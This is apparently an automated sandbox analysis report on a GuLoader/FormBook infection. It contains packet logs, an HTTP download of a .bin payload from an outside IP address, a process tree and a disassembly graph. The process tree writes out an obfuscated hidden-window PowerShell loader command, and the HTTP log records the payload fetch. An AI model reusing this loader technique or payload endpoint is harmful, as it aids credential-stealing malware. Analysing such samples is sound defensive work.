                                        Dec 10, 2024 14:09:53.588265896 CET4970780192.168.2.10212.162.149.66
                                        Dec 10, 2024 14:09:53.588418961 CET8049707212.162.149.66192.168.2.10
                                        Dec 10, 2024 14:09:53.588505030 CET4970780192.168.2.10212.162.149.66
                                        Dec 10, 2024 14:09:53.590306997 CET8049707212.162.149.66192.168.2.10
                                        Dec 10, 2024 14:09:53.590420961 CET4970780192.168.2.10212.162.149.66
                                        Dec 10, 2024 14:09:53.590761900 CET8049707212.162.149.66192.168.2.10
                                        Dec 10, 2024 14:09:53.591414928 CET4970780192.168.2.10212.162.149.66
                                        Dec 10, 2024 14:09:53.592381001 CET8049707212.162.149.66192.168.2.10
                                        Dec 10, 2024 14:09:53.592463970 CET4970780192.168.2.10212.162.149.66
                                        Dec 10, 2024 14:09:53.592871904 CET8049707212.162.149.66192.168.2.10
                                        Dec 10, 2024 14:09:53.592922926 CET4970780192.168.2.10212.162.149.66
                                        Dec 10, 2024 14:09:53.594460964 CET8049707212.162.149.66192.168.2.10
                                        Dec 10, 2024 14:09:53.594505072 CET4970780192.168.2.10212.162.149.66
                                        Dec 10, 2024 14:09:53.595846891 CET8049707212.162.149.66192.168.2.10
                                        Dec 10, 2024 14:09:53.595913887 CET4970780192.168.2.10212.162.149.66
                                        Dec 10, 2024 14:09:53.596524954 CET8049707212.162.149.66192.168.2.10
                                        Dec 10, 2024 14:09:53.596565008 CET4970780192.168.2.10212.162.149.66
                                        Dec 10, 2024 14:09:53.596815109 CET8049707212.162.149.66192.168.2.10
                                        Dec 10, 2024 14:09:53.598557949 CET8049707212.162.149.66192.168.2.10
                                        Dec 10, 2024 14:09:53.598655939 CET4970780192.168.2.10212.162.149.66
                                        Dec 10, 2024 14:09:53.598884106 CET8049707212.162.149.66192.168.2.10
                                        Dec 10, 2024 14:09:53.599416971 CET4970780192.168.2.10212.162.149.66
                                        Dec 10, 2024 14:09:53.600634098 CET8049707212.162.149.66192.168.2.10
                                        Dec 10, 2024 14:09:53.600696087 CET4970780192.168.2.10212.162.149.66
                                        Dec 10, 2024 14:09:53.600864887 CET8049707212.162.149.66192.168.2.10
                                        Dec 10, 2024 14:09:53.600960970 CET4970780192.168.2.10212.162.149.66
                                        Dec 10, 2024 14:09:53.602773905 CET8049707212.162.149.66192.168.2.10
                                        Dec 10, 2024 14:09:53.602822065 CET4970780192.168.2.10212.162.149.66
                                        Dec 10, 2024 14:09:53.602977991 CET8049707212.162.149.66192.168.2.10
                                        Dec 10, 2024 14:09:53.603037119 CET4970780192.168.2.10212.162.149.66
                                        Dec 10, 2024 14:09:53.604856968 CET8049707212.162.149.66192.168.2.10
                                        Dec 10, 2024 14:09:53.604945898 CET4970780192.168.2.10212.162.149.66
                                        Dec 10, 2024 14:09:53.605453014 CET8049707212.162.149.66192.168.2.10
                                        Dec 10, 2024 14:09:53.605508089 CET4970780192.168.2.10212.162.149.66
                                        Dec 10, 2024 14:09:53.606914997 CET8049707212.162.149.66192.168.2.10
                                        Dec 10, 2024 14:09:53.606975079 CET8049707212.162.149.66192.168.2.10
                                        Dec 10, 2024 14:09:53.607018948 CET4970780192.168.2.10212.162.149.66
                                        Dec 10, 2024 14:09:53.608918905 CET8049707212.162.149.66192.168.2.10
                                        Dec 10, 2024 14:09:53.608961105 CET4970780192.168.2.10212.162.149.66
                                        Dec 10, 2024 14:09:53.609705925 CET8049707212.162.149.66192.168.2.10
                                        Dec 10, 2024 14:09:53.609766960 CET4970780192.168.2.10212.162.149.66
                                        Dec 10, 2024 14:09:53.610946894 CET8049707212.162.149.66192.168.2.10
                                        Dec 10, 2024 14:09:53.611018896 CET4970780192.168.2.10212.162.149.66
                                        Dec 10, 2024 14:09:53.611872911 CET8049707212.162.149.66192.168.2.10
                                        Dec 10, 2024 14:09:53.611938000 CET4970780192.168.2.10212.162.149.66
                                        Dec 10, 2024 14:09:53.613009930 CET8049707212.162.149.66192.168.2.10
                                        Dec 10, 2024 14:09:53.613049984 CET4970780192.168.2.10212.162.149.66
                                        Dec 10, 2024 14:09:53.613209009 CET8049707212.162.149.66192.168.2.10
                                        Dec 10, 2024 14:09:53.615444899 CET4970780192.168.2.10212.162.149.66
                                        Dec 10, 2024 14:09:53.615968943 CET8049707212.162.149.66192.168.2.10
                                        Dec 10, 2024 14:09:53.615976095 CET8049707212.162.149.66192.168.2.10
                                        Dec 10, 2024 14:09:53.616019011 CET4970780192.168.2.10212.162.149.66
                                        Dec 10, 2024 14:09:53.617583990 CET8049707212.162.149.66192.168.2.10
                                        Dec 10, 2024 14:09:53.617649078 CET4970780192.168.2.10212.162.149.66
                                        Dec 10, 2024 14:09:53.617750883 CET8049707212.162.149.66192.168.2.10
                                        Dec 10, 2024 14:09:53.617808104 CET4970780192.168.2.10212.162.149.66
                                        Dec 10, 2024 14:09:53.619405985 CET8049707212.162.149.66192.168.2.10
                                        Dec 10, 2024 14:09:53.619414091 CET8049707212.162.149.66192.168.2.10
                                        Dec 10, 2024 14:09:53.619666100 CET4970780192.168.2.10212.162.149.66
                                        Dec 10, 2024 14:09:53.621159077 CET8049707212.162.149.66192.168.2.10
                                        Dec 10, 2024 14:09:53.621303082 CET8049707212.162.149.66192.168.2.10
                                        Dec 10, 2024 14:09:53.621371984 CET4970780192.168.2.10212.162.149.66
                                        Dec 10, 2024 14:09:53.623241901 CET8049707212.162.149.66192.168.2.10
                                        Dec 10, 2024 14:09:53.623286009 CET4970780192.168.2.10212.162.149.66
                                        Dec 10, 2024 14:09:53.623420954 CET8049707212.162.149.66192.168.2.10
                                        Dec 10, 2024 14:09:53.625408888 CET8049707212.162.149.66192.168.2.10
                                        Dec 10, 2024 14:09:53.625441074 CET4970780192.168.2.10212.162.149.66
                                        Dec 10, 2024 14:09:53.625459909 CET4970780192.168.2.10212.162.149.66
                                        Dec 10, 2024 14:09:53.625535011 CET8049707212.162.149.66192.168.2.10
                                        Dec 10, 2024 14:09:53.625593901 CET4970780192.168.2.10212.162.149.66
                                        Dec 10, 2024 14:09:53.627553940 CET8049707212.162.149.66192.168.2.10
                                        Dec 10, 2024 14:09:53.627559900 CET8049707212.162.149.66192.168.2.10
                                        Dec 10, 2024 14:09:53.627600908 CET4970780192.168.2.10212.162.149.66
                                        Dec 10, 2024 14:09:53.629514933 CET8049707212.162.149.66192.168.2.10
                                        Dec 10, 2024 14:09:53.629623890 CET8049707212.162.149.66192.168.2.10
                                        Dec 10, 2024 14:09:53.629687071 CET4970780192.168.2.10212.162.149.66
                                        Dec 10, 2024 14:09:53.631725073 CET8049707212.162.149.66192.168.2.10
                                        Dec 10, 2024 14:09:53.631731987 CET8049707212.162.149.66192.168.2.10
                                        Dec 10, 2024 14:09:53.631791115 CET4970780192.168.2.10212.162.149.66
                                        Dec 10, 2024 14:09:53.633630037 CET8049707212.162.149.66192.168.2.10
                                        Dec 10, 2024 14:09:53.633687019 CET4970780192.168.2.10212.162.149.66
                                        Dec 10, 2024 14:09:53.633713961 CET8049707212.162.149.66192.168.2.10
                                        Dec 10, 2024 14:09:53.633765936 CET4970780192.168.2.10212.162.149.66
                                        Dec 10, 2024 14:09:53.635885000 CET8049707212.162.149.66192.168.2.10
                                        Dec 10, 2024 14:09:53.635891914 CET8049707212.162.149.66192.168.2.10
                                        Dec 10, 2024 14:09:53.636003971 CET4970780192.168.2.10212.162.149.66
                                        Dec 10, 2024 14:09:53.637511015 CET8049707212.162.149.66192.168.2.10
                                        Dec 10, 2024 14:09:53.637572050 CET4970780192.168.2.10212.162.149.66
                                        Dec 10, 2024 14:09:53.637648106 CET8049707212.162.149.66192.168.2.10
                                        Dec 10, 2024 14:09:53.637860060 CET4970780192.168.2.10212.162.149.66
                                        Dec 10, 2024 14:09:53.639611959 CET8049707212.162.149.66192.168.2.10
                                        Dec 10, 2024 14:09:53.639658928 CET4970780192.168.2.10212.162.149.66
                                        Dec 10, 2024 14:09:53.639681101 CET8049707212.162.149.66192.168.2.10
                                        Dec 10, 2024 14:09:53.639729023 CET4970780192.168.2.10212.162.149.66
                                        Dec 10, 2024 14:09:53.641406059 CET8049707212.162.149.66192.168.2.10
                                        Dec 10, 2024 14:09:53.641453981 CET8049707212.162.149.66192.168.2.10
                                        Dec 10, 2024 14:09:53.641511917 CET4970780192.168.2.10212.162.149.66
                                        Dec 10, 2024 14:09:53.643507004 CET8049707212.162.149.66192.168.2.10
                                        Dec 10, 2024 14:09:53.643517017 CET8049707212.162.149.66192.168.2.10
                                        Dec 10, 2024 14:09:53.643573046 CET4970780192.168.2.10212.162.149.66
                                        Dec 10, 2024 14:09:53.645117044 CET8049707212.162.149.66192.168.2.10
                                        Dec 10, 2024 14:09:53.645174026 CET4970780192.168.2.10212.162.149.66
                                        Dec 10, 2024 14:09:53.645308971 CET8049707212.162.149.66192.168.2.10
                                        Dec 10, 2024 14:09:53.645452976 CET4970780192.168.2.10212.162.149.66
                                        Dec 10, 2024 14:09:53.647142887 CET8049707212.162.149.66192.168.2.10
                                        Dec 10, 2024 14:09:53.647151947 CET8049707212.162.149.66192.168.2.10
                                        Dec 10, 2024 14:09:53.647320986 CET4970780192.168.2.10212.162.149.66
                                        Dec 10, 2024 14:09:53.649013996 CET8049707212.162.149.66192.168.2.10
                                        Dec 10, 2024 14:09:53.649077892 CET4970780192.168.2.10212.162.149.66
                                        Dec 10, 2024 14:09:53.649086952 CET8049707212.162.149.66192.168.2.10
                                        Dec 10, 2024 14:09:53.649136066 CET4970780192.168.2.10212.162.149.66
                                        Dec 10, 2024 14:09:53.650775909 CET8049707212.162.149.66192.168.2.10
                                        Dec 10, 2024 14:09:53.650856972 CET8049707212.162.149.66192.168.2.10
                                        Dec 10, 2024 14:09:53.650923014 CET4970780192.168.2.10212.162.149.66
                                        Dec 10, 2024 14:09:53.652682066 CET8049707212.162.149.66192.168.2.10
                                        Dec 10, 2024 14:09:53.653099060 CET8049707212.162.149.66192.168.2.10
                                        Dec 10, 2024 14:09:53.653158903 CET4970780192.168.2.10212.162.149.66
                                        Dec 10, 2024 14:09:53.654700041 CET8049707212.162.149.66192.168.2.10
                                        Dec 10, 2024 14:09:53.654742002 CET8049707212.162.149.66192.168.2.10
                                        Dec 10, 2024 14:09:53.654814005 CET4970780192.168.2.10212.162.149.66
                                        Dec 10, 2024 14:09:53.656219006 CET8049707212.162.149.66192.168.2.10
                                        Dec 10, 2024 14:09:53.656286001 CET4970780192.168.2.10212.162.149.66
                                        Dec 10, 2024 14:09:53.656299114 CET8049707212.162.149.66192.168.2.10
                                        Dec 10, 2024 14:09:53.656354904 CET4970780192.168.2.10212.162.149.66
                                        Dec 10, 2024 14:09:53.658018112 CET8049707212.162.149.66192.168.2.10
                                        Dec 10, 2024 14:09:53.658073902 CET8049707212.162.149.66192.168.2.10
                                        Dec 10, 2024 14:09:53.658127069 CET4970780192.168.2.10212.162.149.66
                                        Dec 10, 2024 14:09:53.659799099 CET8049707212.162.149.66192.168.2.10
                                        Dec 10, 2024 14:09:53.660113096 CET8049707212.162.149.66192.168.2.10
                                        Dec 10, 2024 14:09:53.660156965 CET4970780192.168.2.10212.162.149.66
                                        Dec 10, 2024 14:09:53.661561012 CET8049707212.162.149.66192.168.2.10
                                        Dec 10, 2024 14:09:53.661725998 CET8049707212.162.149.66192.168.2.10
                                        Dec 10, 2024 14:09:53.661775112 CET4970780192.168.2.10212.162.149.66
                                        Dec 10, 2024 14:09:53.663408995 CET8049707212.162.149.66192.168.2.10
                                        Dec 10, 2024 14:09:53.663415909 CET8049707212.162.149.66192.168.2.10
                                        Dec 10, 2024 14:09:53.663472891 CET4970780192.168.2.10212.162.149.66
                                        Dec 10, 2024 14:09:53.665273905 CET8049707212.162.149.66192.168.2.10
                                        Dec 10, 2024 14:09:53.665281057 CET8049707212.162.149.66192.168.2.10
                                        Dec 10, 2024 14:09:53.665338039 CET4970780192.168.2.10212.162.149.66
                                        Dec 10, 2024 14:09:53.667808056 CET8049707212.162.149.66192.168.2.10
                                        Dec 10, 2024 14:09:53.667814970 CET8049707212.162.149.66192.168.2.10
                                        Dec 10, 2024 14:09:53.667870045 CET4970780192.168.2.10212.162.149.66
                                        Dec 10, 2024 14:09:53.669195890 CET8049707212.162.149.66192.168.2.10
                                        Dec 10, 2024 14:09:53.669203043 CET8049707212.162.149.66192.168.2.10
                                        Dec 10, 2024 14:09:53.669258118 CET4970780192.168.2.10212.162.149.66
                                        Dec 10, 2024 14:09:53.670248032 CET8049707212.162.149.66192.168.2.10
                                        Dec 10, 2024 14:09:53.670327902 CET4970780192.168.2.10212.162.149.66
                                        Dec 10, 2024 14:09:53.670665979 CET8049707212.162.149.66192.168.2.10
                                        Dec 10, 2024 14:09:53.671428919 CET4970780192.168.2.10212.162.149.66
                                        Dec 10, 2024 14:09:53.671865940 CET8049707212.162.149.66192.168.2.10
                                        Dec 10, 2024 14:09:53.671919107 CET4970780192.168.2.10212.162.149.66
                                        Dec 10, 2024 14:09:53.672027111 CET8049707212.162.149.66192.168.2.10
                                        Dec 10, 2024 14:09:53.672068119 CET4970780192.168.2.10212.162.149.66
                                        Dec 10, 2024 14:09:53.673280001 CET8049707212.162.149.66192.168.2.10
                                        Dec 10, 2024 14:09:53.673348904 CET4970780192.168.2.10212.162.149.66
                                        Dec 10, 2024 14:09:53.673379898 CET8049707212.162.149.66192.168.2.10
                                        Dec 10, 2024 14:09:53.675287008 CET8049707212.162.149.66192.168.2.10
                                        Dec 10, 2024 14:09:53.675293922 CET8049707212.162.149.66192.168.2.10
                                        Dec 10, 2024 14:09:53.675340891 CET4970780192.168.2.10212.162.149.66
                                        Dec 10, 2024 14:09:53.676520109 CET8049707212.162.149.66192.168.2.10
                                        Dec 10, 2024 14:09:53.676526070 CET8049707212.162.149.66192.168.2.10
                                        Dec 10, 2024 14:09:53.676584959 CET4970780192.168.2.10212.162.149.66
                                        Dec 10, 2024 14:10:14.624515057 CET4970780192.168.2.10212.162.149.66

                                        HTTP Request Dependency Graph

                                        • 212.162.149.66

                                        HTTP Packets

                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        0192.168.2.1049707212.162.149.66806888C:\Users\user\AppData\Local\Temp\Fathoming.exe
                                        TimestampBytes transferredDirectionData
                                        Dec 10, 2024 14:09:51.673574924 CET193OUTGET /JiYpNWaslXZHcEPiPEuXaEONVju173.bin HTTP/1.1
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                        Host: 212.162.149.66
                                        Cache-Control: no-cache
                                        Dec 10, 2024 14:09:52.971339941 CET1236INHTTP/1.1 200 OK
                                        Content-Type: application/octet-stream
                                        Last-Modified: Tue, 10 Dec 2024 08:23:46 GMT
                                        Accept-Ranges: bytes
                                        ETag: "b31f3d4dc4adb1:0"
                                        Server: Microsoft-IIS/8.5
                                        Date: Tue, 10 Dec 2024 13:09:54 GMT
                                        Content-Length: 287808
                                        Data Raw: 14 f0 a5 38 b6 42 d8 5a 66 3e e7 98 5d 2c c0 b8 6b 5a 96 28 3b f5 b2 04 78 44 49 bb 42 d5 6b 19 63 94 73 32 de d0 e4 ca b7 b2 03 b9 e3 35 a9 eb b6 c4 50 14 8d 9b a4 8f 19 bc 94 10 9f b4 59 f0 0b d0 ad 6e 32 b7 80 02 3c 53 a5 ed de 9a d1 27 be 7f ed 83 74 6d d2 dd 81 d6 44 a3 77 dc b7 44 7d 82 45 9e 26 2a d0 17 83 ea d1 af 35 ec 74 e0 71 b3 49 a5 4b 87 ea b3 23 28 d1 61 ae 80 61 9b c5 90 53 67 ab 50 c4 05 09 a7 a0 f1 47 69 cc 0b dc c9 e1 0a 3c 3d c2 38 aa a4 00 71 2f c7 5c e5 40 2f 64 7d 12 2c f2 16 9f e7 6e 49 41 07 c9 9d 23 49 b4 4e 21 1d c3 61 a9 b8 32 7b ad 48 de 51 97 6f 7b e0 1d 78 12 5a 49 67 67 dc 24 8c 7c 87 ea 5e c4 1e 53 b8 4d 42 7a bd eb d0 46 af 46 ba 6f 36 13 a7 5c 59 0c 0f 88 12 42 97 47 26 cf 65 b0 19 40 97 53 4b c1 df 00 22 1e 7f 39 70 4d 17 41 7a 64 6a 42 9e 79 67 f6 83 6f e0 40 0b 2e d6 33 51 05 47 5e 97 80 3d 3e aa 2b 00 f2 d6 a7 f2 3e c2 96 73 21 c5 3b a7 e8 86 75 ec e9 ba 9b a1 86 46 d3 b6 ed 34 f7 c0 3a ce d9 88 db ff 65 b2 eb 73 fc 56 d9 a3 78 99 f1 51 11 69 d5 f5 fc 89 ac bc [TRUNCATED]
                                        Data Ascii: 8BZf>],kZ(;xDIBkcs25PYn2<S'tmDwD}E&*5tqIK#(aaSgPGi<=8q/\@/d},nIA#IN!a2{HQo{xZIgg$|^SMBzFFo6\YBG&e@SK"9pMAzdjBygo@.3QG^=>+>s!;uF4:esVxQi\nX5suzhU*9+U[LCY{@Rd7h{Q+RKvZf%7!/`L[s7g&${c05;UC^bx'dG\1Ce*EJ6jT/qF?Rh#*/<7]J0=l3(:Hz(Zr>HN2Qp0$"Vl5!7LTK -f(6eWw]V_Z5#YBCp`;?2@bbzJeXj05|yhHD{Q= 2n:gFdlOe}r`(L<5zS^O@\QY2dDaya#Y2>}IQk?Q8v3WE&)%":fL3@lc5CgzP%O[Tx}V.a&7V|%<N"SP@3yW3Gh'CGw`7|`Yp'Q?(q
                                        Dec 10, 2024 14:09:52.971940994 CET1236INData Raw: c0 69 61 9b 9d bf fc be bb 89 48 ba 12 09 b9 de a0 ae 06 70 98 ea a8 9f 8f a8 95 d1 c0 7d 1c 41 03 37 7b 03 bb 6a 79 69 33 29 3e 46 70 12 df 93 9a 99 39 8e d3 89 65 eb 62 2b 8d aa 99 fe e2 3f 46 28 48 74 1f 9e ea 92 38 dc 26 e2 b5 3b 3a ba 66 ba
                                        Data Ascii: iaHp}A7{jyi3)>Fp9eb+?F(Ht8&;:fR[#V)u {`bX^RC1pj6X-xURGorJlWF,{gSz&`)eL_fqZ'&ld#xkgRBs$YN1aOSqT
                                        Dec 10, 2024 14:09:52.971949100 CET448INData Raw: 04 7a a5 a2 be 1f 53 a5 5e 4f b2 40 c8 cb eb de 5c 51 90 8b 59 32 fc ac 64 d4 44 b4 ca 90 de 61 0e ae f0 eb f5 79 de 61 02 bd 23 59 c0 9f 9a 13 f0 93 f9 04 32 3e 7d 99 fd 49 11 99 51 6b 10 02 15 3f 99 ad b2 12 ef cf 51 38 e6 95 a6 76 09 7f c0 00
                                        Data Ascii: zS^O@\QY2dDaya#Y2>}IQk?Q8v3WE&)%":fL3@lc5CgzP%O[Tx}V.a&7V|%<N"SP@3yW3Gh'CGw`7|`Yp'Q?(qiaHp
                                        Dec 10, 2024 14:09:52.971956968 CET1236INData Raw: d5 e5 a9 80 85 61 f4 06 4f 53 eb 71 54 00 17 b0 ff 67 b0 f2 e2 33 eb 24 57 13 0c 1d 21 3f 3f 6b 22 61 c8 3a ad 17 01 8e 74 f2 fc c9 37 1a 4f e9 6c 49 9b 07 bf ae 5b a5 68 ef c5 8a 72 64 97 80 b2 b1 93 dd 9e 26 5f 83 38 0b 27 80 d6 68 40 4d 9b 3a
                                        Data Ascii: aOSqTg3$W!??k"a:t7OlI[hrd&_8'h@M:p#o(JfHRCY98iJpu'f;P{E%D9g\|F84X{j"Ro,z+;m4CS{W%v(JZ_/DuL8Lph
                                        Dec 10, 2024 14:09:52.972007990 CET1236INData Raw: fc be bb 89 48 ba 12 09 b9 de a0 ae 06 70 98 ea a8 9f 8f a8 95 d1 c0 7d 1c 41 03 37 7b 03 bb 6a 79 69 33 29 3e 46 70 12 df 93 9a 99 39 8e d3 89 65 eb 62 2b 8d aa 99 fe e2 3f 46 28 48 74 1f 9e ea 92 38 dc 26 e2 b5 3b 3a ba 66 ba 94 f1 0e 03 52 e5
                                        Data Ascii: Hp}A7{jyi3)>Fp9eb+?F(Ht8&;:fR[#V)u {`bX^RC1pj6X-xURGorJlWF,{gSz&`)eL_fqZ'&ld#xkgRBs$YN1aOSqTg3
                                        Dec 10, 2024 14:09:52.972042084 CET448INData Raw: 26 a7 5d b9 33 be 38 ed eb de 20 8d 1b ce 55 c1 f3 d2 21 0c 22 bb 1c 90 2d 6e 70 eb 10 8d fa af 9e 69 f1 b2 5d 1c 28 c0 fc 1c 26 d3 e9 f7 3d 40 38 69 a3 2f 1e 4f 11 73 4b 89 f0 62 5a 16 c5 36 ef cf e9 45 85 4f a2 81 e2 be 3a 02 6b a5 f2 56 88 8a
                                        Data Ascii: &]38 U!"-npi](&=@8i/OsKbZ6EO:kV2?O6#%eo$8l}VDFl}.)r*ynCA#g{w-hF1%p9ro%Vtq1'~8o6?Z}wE1U#\
                                        Dec 10, 2024 14:09:52.973244905 CET1236INData Raw: f4 be 5a 51 a6 50 a3 ef d6 4a fa ec 4a 33 0d 2c e8 de 22 fe b5 c3 31 3f 3f 80 24 ec 53 3a ad 17 01 36 3f c6 8c 42 c0 f3 4c 38 ad b3 9c 8c 75 6f b2 ba 6b 25 b0 61 ff 21 37 d0 3f 34 ff 22 61 d9 0f 6b 63 1c 27 80 55 ac 48 f5 55 45 70 23 6d aa c3 bc
                                        Data Ascii: ZQPJJ3,"1??$S:6?BL8uok%a!7?4"akc'UHUEp#mn&6]o9Y`I~8iJ2u~)>,5.9w^8"#I87>@J5U=,:+X'IM`b
                                        Dec 10, 2024 14:09:52.973633051 CET1236INData Raw: b3 76 b9 de dc 59 87 8a 75 e9 a8 9f f2 86 2b 3d c3 7d 1c 6a f1 8f 5e 4a 29 4e 8e 8f 18 db ef a8 73 e0 54 c6 66 58 d7 8c 50 4b 62 66 66 de 8d aa 99 fe c9 f9 cd 5d b0 77 cf 17 bf 6e bd 15 52 f7 0d 9a 9a 1a c6 4d 7d f2 df c2 a8 e3 5a 50 3b e6 44 ee
                                        Data Ascii: vYu+=}j^J)NsTfXPKbff]wnRM}ZP;DZ&u]iX"$4-UO\cC7;"I]0pdT}d/0V#-JIK"ckx&l7tNWg\\e?nIO(f$WY
                                        Dec 10, 2024 14:09:52.973639965 CET1236INData Raw: 09 31 ee 55 96 90 79 94 5a f8 89 41 ed 99 98 3f 87 80 55 e0 2a ac f0 eb 0a a9 55 1c e2 d7 6d d4 45 b7 65 ec 0f c3 ae ec 2f 30 7d 99 76 1c 01 aa a7 e8 d4 0e 2c 8d a9 af b2 12 99 82 da ba d2 96 a6 76 4f f5 80 03 d0 3b 0d 42 1c 0b dc 97 d2 90 e7 e1
                                        Data Ascii: 1UyZA?U*UmEe/0}v,vO;B{+9vndN$-RO3h^bYOk[EF8V.oSJm{ud-h=G3G23G~B0o`$' C'zg(EhHCCg>{jW
                                        Dec 10, 2024 14:09:52.973645926 CET1236INData Raw: 6c be 6f 2a f6 90 fe e2 f9 8b bf e9 0e 03 7f a3 80 08 0e 0b 71 25 4b 18 61 87 b0 3b 7e 75 14 32 39 e8 3c da b3 6c 33 1f 27 e4 52 47 15 bd a0 94 f7 ed 35 d7 ec 26 6e 13 1d 79 2f a5 0f ae f7 0c c1 8a 34 d0 ee 66 f8 cd 6f fb bf 81 60 92 a3 f4 a4 5f
                                        Data Ascii: lo*q%Ka;~u29<l3'RG5&ny/4fo`_G]WY9|#,qqOzof?}.DaOvse-y}Zd~5&6+zKw_';9da"A3Bt9w{OY.]eEC*6CRRUreou
                                        Dec 10, 2024 14:09:53.127928972 CET1236INData Raw: a4 d3 ce c0 0a a9 58 42 4f 50 25 05 94 85 73 75 75 61 77 5c cf 0e f0 59 74 30 19 e1 17 05 b8 49 91 6c 30 37 a5 7d 24 39 fa dd a3 68 85 1d a8 07 ab f7 a9 59 00 9c 59 46 ae de 97 96 b6 85 39 18 67 3e 1b c5 d4 37 cd 68 17 a0 4b 36 14 e2 75 6f ad 48
                                        Data Ascii: XBOP%suuaw\Yt0Il07}$9hYYF9g>7hK6uoHrb/96EHy2rT_FsD'\96nO!9]iD%{ToDLEj4/0P#ZOk0U=l`(LL


                                        Statistics

                                        CPU Usage

                                        Click to jump to process

                                        Memory Usage

                                        Click to jump to process

                                        High Level Behavior Distribution

                                        Click to dive into process behavior distribution

                                        Behavior

                                        Click to jump to process

                                        System Behavior

                                        General

                                        Target ID:0
                                        Start time:08:07:35
                                        Start date:10/12/2024
                                        Path:C:\Users\user\Desktop\purchase.order.exe
                                        Wow64 process (32bit):true
                                        Commandline:"C:\Users\user\Desktop\purchase.order.exe"
                                        Imagebase:0x400000
                                        File size:801'068 bytes
                                        MD5 hash:8125E510DF447B0EAD0E263D006A253E
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:low
                                        Has exited:true

                                        General

                                        Target ID:2
                                        Start time:08:07:36
                                        Start date:10/12/2024
                                        Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                        Wow64 process (32bit):true
                                        Commandline:powershell.exe -windowstyle hidden "$Unsolaced207=gc -raw 'C:\Users\user\AppData\Local\Temp\Blankbook85\patchworkenes\resprmiernes\Databehandlende\Pennyroyal.Gri';$Fortolkningssikker=$Unsolaced207.SubString(29825,3);.$Fortolkningssikker($Unsolaced207)
                                        Imagebase:0xd40000
                                        File size:433'152 bytes
                                        MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Yara matches:
                                        • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000002.00000002.2661158092.0000000008F37000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                        Reputation:high
                                        Has exited:true

                                        General

                                        Target ID:3
                                        Start time:08:07:36
                                        Start date:10/12/2024
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff620390000
                                        File size:862'208 bytes
                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:high
                                        Has exited:true

                                        General

                                        Target ID:8
                                        Start time:08:09:36
                                        Start date:10/12/2024
                                        Path:C:\Users\user\AppData\Local\Temp\Fathoming.exe
                                        Wow64 process (32bit):true
                                        Commandline:"C:\Users\user\AppData\Local\Temp\Fathoming.exe"
                                        Imagebase:0x400000
                                        File size:801'068 bytes
                                        MD5 hash:8125E510DF447B0EAD0E263D006A253E
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Yara matches:
                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000008.00000002.3003104703.0000000021750000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                        Antivirus matches:
                                        • Detection: 100%, Joe Sandbox ML
                                        • Detection: 18%, ReversingLabs
                                        Reputation:low
                                        Has exited:true

                                        Disassembly

                                        Reset < >

                                          Execution Graph

                                          Execution Coverage:19.2%
                                          Dynamic/Decrypted Code Coverage:0%
                                          Signature Coverage:17.4%
                                          Total number of Nodes:1341
                                          Total number of Limit Nodes:24
                                          execution_graph 3200 401bc0 3201 401c11 3200->3201 3202 401bcd 3200->3202 3204 401c16 3201->3204 3205 401c3b GlobalAlloc 3201->3205 3203 4023af 3202->3203 3208 401be4 3202->3208 3207 40657e 21 API calls 3203->3207 3213 401c56 3204->3213 3238 406541 lstrcpynW 3204->3238 3219 40657e 3205->3219 3211 4023bc 3207->3211 3236 406541 lstrcpynW 3208->3236 3210 401c28 GlobalFree 3210->3213 3239 405ba1 3211->3239 3215 401bf3 3237 406541 lstrcpynW 3215->3237 3217 401c02 3243 406541 lstrcpynW 3217->3243 3234 406589 3219->3234 3220 4067d0 3221 4067e9 3220->3221 3266 406541 lstrcpynW 3220->3266 3221->3213 3223 4067a1 lstrlenW 3223->3234 3227 40669a GetSystemDirectoryW 3227->3234 3228 40657e 15 API calls 3228->3223 3229 4066b0 GetWindowsDirectoryW 3229->3234 3230 40657e 15 API calls 3230->3234 3231 406742 lstrcatW 3231->3234 3234->3220 3234->3223 3234->3227 3234->3228 3234->3229 3234->3230 3234->3231 3235 406712 SHGetPathFromIDListW CoTaskMemFree 3234->3235 3244 40640f 3234->3244 3249 406935 GetModuleHandleA 3234->3249 3255 4067ef 3234->3255 3264 406488 wsprintfW 3234->3264 3265 406541 lstrcpynW 3234->3265 3235->3234 3236->3215 3237->3217 3238->3210 3240 405bb6 3239->3240 3241 405c02 3240->3241 3242 405bca MessageBoxIndirectW 3240->3242 3241->3213 3242->3241 3243->3213 3267 4063ae 3244->3267 3247 406443 RegQueryValueExW RegCloseKey 3248 406473 3247->3248 3248->3234 3250 406951 3249->3250 3251 40695b GetProcAddress 3249->3251 3271 4068c5 GetSystemDirectoryW 3250->3271 3253 40696a 3251->3253 3253->3234 3254 406957 3254->3251 3254->3253 3261 4067fc 3255->3261 3256 406877 CharPrevW 3257 406872 3256->3257 3257->3256 3259 406898 3257->3259 3258 406865 CharNextW 3258->3257 3258->3261 3259->3234 3261->3257 3261->3258 3262 406851 CharNextW 3261->3262 3263 406860 CharNextW 3261->3263 3274 405e3d 3261->3274 3262->3261 3263->3258 3264->3234 3265->3234 3266->3221 3268 4063bd 3267->3268 3269 4063c1 3268->3269 3270 4063c6 RegOpenKeyExW 3268->3270 3269->3247 3269->3248 3270->3269 3272 4068e7 wsprintfW LoadLibraryExW 3271->3272 3272->3254 3275 405e43 3274->3275 3276 405e59 3275->3276 3277 405e4a CharNextW 3275->3277 3276->3261 3277->3275 3278 403fc1 3279 403fd9 3278->3279 3280 40413a 3278->3280 3279->3280 3283 403fe5 3279->3283 3281 40418b 3280->3281 3282 40414b 